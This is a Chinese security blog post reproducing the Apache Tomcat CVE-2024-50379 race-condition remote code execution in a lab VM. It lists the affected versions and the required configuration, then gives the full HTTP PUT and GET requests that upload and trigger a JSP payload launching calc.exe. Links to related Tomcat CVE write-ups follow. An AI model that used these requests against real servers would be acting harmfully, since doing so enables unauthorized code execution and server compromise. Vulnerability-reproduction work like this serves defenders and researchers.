【漏洞复现】Tomcat 远程代码执行漏洞 (CVE-2024-50379)

最新推荐文章于 2025-03-14 10:12:49 发布
最新推荐文章于 2025-03-14 10:12:49 发布
阅读量652 收藏 5
点赞数 4
分类专栏: 漏洞复现 文章标签: CVE-2024-50379
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/144667033
版权

目录

漏洞简介

影响版本

环境搭建

漏洞复现

漏洞 exp

漏洞简介

Apache Tomcat 存在一个远程代码执行漏洞,当默认Servlet的readonly参数被设置为 false时,攻击者可以利用条件竞争,使用PUT方法上传恶意代码并触发执行,导致服务器失陷。

影响版本

该漏洞仅影响 Windows 环境。

  • 9.0.0.M1 ≤ Apache Tomcat < 9.0.98
  • 10.1.0-M1 ≤ Apache Tomcat < 10.1.34
  • 11.0.0-M1 ≤ Apache Tomcat < 11.0.2

环境搭建

复现环境:

  • win2016(虚拟机内存 1G,处理器一个) + tomcat 9.0.97 。tomcat9 要先安装至少 jdk1.8 的环境。

前置条件:Tomcat配置中的 readonly 参数为 false,且允许使用PUT方法,且系统为Windows。

在 conf\web.xml 中添加如下配置将 readonly 参数设置为false 即可。tomcat 默认允许 put 方法所以无需修改。

<init-param>
    <param-name>readonly</param-name>
    <param-value>false</param-value>
</init-param>

漏洞复现

首先尝试使用 PUT 方法上传一个 test.Jsp 文件 ,发现上传成功

PUT /test.Jsp HTTP/1.1
Host: 192.168.67.158:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Content-Length: 45

<% Runtime.getRuntime().exec("calc.exe");%>

但是是不会解析的

所以,下面通过条件竞争的方式不断发送请求上传包含 JSP 代码的文件,触发 Tomcat 对其解析和执行,最终实现远程代码执行弹出 calc。

  1. 同时并行发送如下 4 个请求
PUT /test1.Jsp HTTP/1.1
Host: 192.168.67.158:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Content-Length: 45

<% Runtime.getRuntime().exec("calc.exe");%>

PUT /test2.Jsp HTTP/1.1
Host: 192.168.67.158:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Content-Length: 45

<% Runtime.getRuntime().exec("calc.exe");%>

GET /test1.jsp HTTP/1.1
Host: 192.168.67.158:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0


GET /test2.jsp HTTP/1.1
Host: 192.168.67.158:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0

漏洞 exp

为了方便,这里我将其写成了 python 脚本,一键执行

大约两分多钟...

漏洞复现】Apache Tomcat 远程代码执行CVE-2025-24813)
李火火的安全圈
03-28 414
Apache Tomcat 是一个开源的、轻量级的 Java Servlet 容器和 Web 服务器,由Apache软件基金会开发和维护,支持运行 Java Servlet、JavaServer Pages (JSP) 和其他基于 Java 的 Web 应用程序,广泛用于开发和部署企业级 Web 应用。
漏洞复现】Apache Tomcat远程代码执行漏洞CVE-2024-56337)
李火火的安全圈
12-24 2038
CVE-2024-56337是一个存在于Apache Tomcat中的TOCTOU(Time-of-Check Time-of-Use)竞争条件漏洞。此漏洞源于对先前漏洞CVE-2024-50379)的不完整修复。若默认servlet是可写的(参数readonly设置值为false,该设置为非默认设置)表示不区分大小写文件系统,在负载下并发读取和上传同一文件可以绕过Tomcat的大小写检查。攻击者可以通过构造恶意请求上传含恶意JSP代码的文件,使其触发解析并执行这些文件,从而导致远程代码执行
CVE-2024-53677 - POC.zip
02-16
CVE-2024-53677 - POC.zip
tomcat远程代码执行漏洞验证
04-17
tomcat远程代码执行漏洞验证
tomcat远程代码执行漏洞cve-2017-12615)复现
qq_40410406的博客
08-10 1109
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。...
漏洞复现】Apache Tomcat远程代码执行漏洞CVE-2017-12615)
网络安全从业者的学习笔记
12-28 1078
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当 启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
Tomcat 远程代码执行 CVE-2019-0232漏洞复现
Chales123的博客
06-07 743
2019年4月10日,Apache Tomcat披露了一个漏洞漏洞编号为CVE-2019-0232,该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。原文链接:https://blog.csdn.net/liuyan76/article/details/107581701。12、在apache-tomcat-9.0.13\webapps\ROOT\WEB-INF目录下。
Apache Tomcat 远程代码执行漏洞教程
gitblog_00991的博客
08-27 655
Apache Tomcat 远程代码执行漏洞教程 CVE-2017-12617Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution 项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2017-12617 项...
漏洞复现】Apache Tomcat条件竞争代码执行漏洞CVE-2024-50379
李火火的安全圈
12-23 919
由于Windows文件系统与Tomcat在路径大小写区分处理上的不一致,当启用了默认servlet的写入功能(设置readonly=false且允许PUT方法),未经身份验证的攻击者可以构造特殊路径绕过Tomcat的路径校验机制,通过条件竞争不断发送请求上传包含恶意JSP代码的文件触发Tomcat对其解析和执行,从而实现远程代码执行
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549和CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-14 6962
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
Apache tomcat远程代码执行验证代码
04-16
Apache tomcat远程代码执行代码
Apache Tomcat 远程代码执行漏洞CVE-2024-50379处置建议和缓解措施
拉丁解牛技术专栏
01-22 310
近期,Apache官方修复了Apache Tomcat 远程代码执行漏洞(CVE-2024-50379), 该漏洞是由于Tomcat在验证文件路径时存在缺陷,如果readonly参数被设置为false(这是一个非标准配置),并且服务器允许通过PUT方法上传文件,那么攻击者就可以上传含有恶意JSP代码的文件。通过不断地发送请求,攻击者可以利用条件竞争,使得Tomcat解析并执行这些恶意文件,从而实现远程代码执行Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813) 超详细!
欢迎来到我的博客,这里是我分享Python开发心得与信息安全探索的乐园。作为一名热衷于编程与安全的技术爱好者,我始终致力于在Python的世界里深耕细作,探索其强大的功能与无限的可能性。同时,信息安全也是我关注的重点,我深知在这个数字化时代,保护数据安全的
03-14 7704
远程代码执行漏洞(CVE-2025-24813)源于 Apache Tomcat 的反序列化机制未对用户输入进行严格验证,攻击者可通过构造恶意序列化对象绕过安全限制,处理部分 PUT 请求时,攻击者利用临时文件路径处理中的缺陷(将路径分隔符"/"替换为“.”),通过特定条件(如启用默认 servlet 的写入功能)实现远程代码执行并控制服务器‌。‌将 Apache Tomcat 升级至安全版本(Tomcat 11.0.2+、10.1.34+、9.0.98+),以修复反序列化漏洞及 PUT 请求处理缺陷‌。
Tomcat 远程代码执行/提权漏洞(CVE-2019-0232)复现
Ciyaso的博客
05-08 1374
一.漏洞概述 该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。由于Apache Tomcat应用范围广泛,该漏洞一旦被大规模利用,带来后果将不堪设想。 触发该漏洞需要同时满足以下条件: 系统为Windows 启用了CGI Servlet(默认为关闭) 启用了enableCmdLineArguments(Tomcat
tomcat远程代码执行漏洞(cve-2017-12615)复现
dbabs的博客
02-12 426
cve-2017-12615
Tomcat远程代码执行漏洞CVE-2017-12615)
热门推荐
Unitue_逆流
10-14 1万+
实验环境操作机:windows XPIP:172.16.11.2目标机:windows server 2003IP:172.16.12.2实验目的了解Tomcat远程代码执行漏洞危害掌握检测利用Tomcat远程代码执行漏洞的能力实验工具Firefox: 中文俗称火狐,一个自由及开放源代码网页浏览器实验内容 TomcatTomcat服务器是一个免费的开放源代码的Web应用服务器。Tomcat是Apa
Tomcat远程代码执行漏洞(CVE-2017-12615)加固指南
乐大厨串串香飘万里
10-19 901
b.升级Tomcat版本到Tomcat8或Tomcat9。远程代码执行漏洞(CVE-2017-12615)
CVE-2024-50379漏洞复现
qq_61972142的博客
01-03 4622
CVE-2024-50379:Apache Tomcat 条件竞争文件上传漏洞 Apache Tomcat作为一款开源的servlet容器,在全球范围内被大量的企业以及开发者所使用,用来搭建各类的web应用,其安全性也极其的重要; 目录 1、漏洞介绍 2、漏洞影响的版本范围 3、漏洞复现环境搭建 4、复现过程 5、漏洞修复建议 1、漏洞介绍 Apache Tomcat存在着TOCTOU竞争条件的远程代码执行漏洞,该漏洞是因为Apache Tomcat在编译解析jsp期
tomcat-ajp-cve-2020-1938 漏洞复现
最新发布
04-05
### Tomcat AJP CVE-2020-1938 漏洞复现方法与攻击原理 #### 背景介绍 Tomcat AJP 协议中的文件包含漏洞CVE-2020-1938)允许攻击者通过构造恶意请求来读取服务器上的任意文件。此漏洞源于 AJP 协议处理不当,可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值